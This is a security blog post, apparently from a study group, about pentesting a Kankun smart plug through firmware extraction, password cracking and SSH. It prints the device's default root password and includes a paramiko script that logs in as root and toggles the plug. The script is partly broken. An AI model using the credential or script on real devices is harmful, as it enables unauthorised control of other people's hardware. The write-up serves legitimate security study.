It has now been almost one year when we started to work on Internet of Things under IoT study group , an initiative by Null Bhopal chapter. Internet of Things have indeed makes a revolutionary change in the way we live, making it more comfortable. But it’s security still remains a point of concern. Small mistakes at the time of manufacturing can sometimes lead to heavy security breaches.
In this process of learning, one of our mentor, Mr. Anant Shrivastava, sponsored us a kankun smart plug and the loopholes present in it made it a perfect device for penetration testing.
The kankun smart plug is an ON/OFF switch that can be controlled by an app. In just a basic port scanning, it was found out that the smart plug has got SSH port open by default. And this makes the plug vulnerable to almost any kind of exploit that can be performed on an iot device.
Initially started with the manual. Google translate comes in handy ☺
The manual comes along with the plug that gives information of where to download the app from. The next step is to setup it up and connect the smart phone and smart plug to the same wifi network. And when successfully configured, the smart plug is added in the device list. Now the smart plug can be controlled remotely via mobile app. There is another feature “ Direct Mode” , where the smart plug acts as a station having SSID : OK_SP3 , and by default there is no password for the network.
The very first thing to look for was the firmware. The reason being that it gives the overview of the device’s software. Information such as the filesystem present, bootloader, the different binaries present can be of great help from a pentester’s point of view. Although the firmwares are available on the internet, but in case you are unable to find, the other approach can be to reverse engineer the app. But first you need to see the actual source code. There are many number of ways to get the source of apk file. Here we are going to use a tool named jadx that can be used to extract the source code.
Now next step is to analyse all the extracted files for any hardcoded URLs. The one way is to have a check all the files one by one but the process is time-consuming. Therefore intelligent use of grep can save us a lot of time.
So here we use grep command with some switches that directly spits out the all url in all the file of all the sub-folders along with their line number. We started with Analysing Hangzhou folder. Luckily we found some hardcoded urls.
The highlighted text in the above screenshot shows the hardcoded url in the file PreferencesUtil.java. Since the url ends with .bin It could be the link to actual firmware. And yes, the app actually downloads this firmware from this url and flash it to the device. After downloading the firmware, run binwalk on kkeps.bin binary file. And it provides you with loads of useful information such as : LZMA compressed data, squashfs filesystem, so on and so forth. After getting this information, -e switch can be used for extracting the filesystem.
Binwalk can be downloaded as
#sudo apt-get install binwalk
And the further dependencies of binwalk can be resolved by running the script, that can be downloaded from the link
# binwalk –e kkeps.bin
So here is the entire linux file system. So the next step would be to get the root password. Which is not very difficult if you have the entire file system.
# unshadow /etc/password /etc/shadow > passwd.txt
Cracking this with John the Ripper give Root password which is p9z34c
CONTROLLING THE SMART PLUG WITH TERMINAL
Now that we know the root password We can directly ssh into the smart plug.
Now by default the kankun smart plug has ssh port open
Turning ON and OFF the smart plug can easily done if we ssh into the smart plug. The root password is p9z34c. We have successfully extracted it.
Turning the smart plug off
# echo 0 > /sys/class/leds/tp-link:blue:relay/brightness
Turning the smart plug on
# echo 1 > /sys/class/leds/tp-link:blue:relay/brightness
This entire process can be done with the help of this python script that I wrote. This script requires paramiko library.
#apt-get install python-paramiko
if len(sys.argv) < 3:
print “args missing”
host = sys.argv
action = sys.argv
ssh = paramiko.SSHClient()
print BLUE +”[*] connecting to device”+ RESET
ssh.connect(host, username=’root’, password=’p9z34c’)
if sys.argv == ‘on’:
ssh.exec_command(‘echo 1 >’ + path)
print GREEN +”[*] turning it ” + action +””+RESET
elif sys.argv == ‘off’:
ssh.exec_command(‘echo 0 >’ + path)
print RED +”[*] turning it ” + action +””+RESET
That Is how we successfully managed to control the smart plug remotely without their Android app. ☺
This report is drafted under the IoT study group, an initiative by Null Bhopal chapter.
Thanks for reading!!
I also write tech and security related blogs on My personal website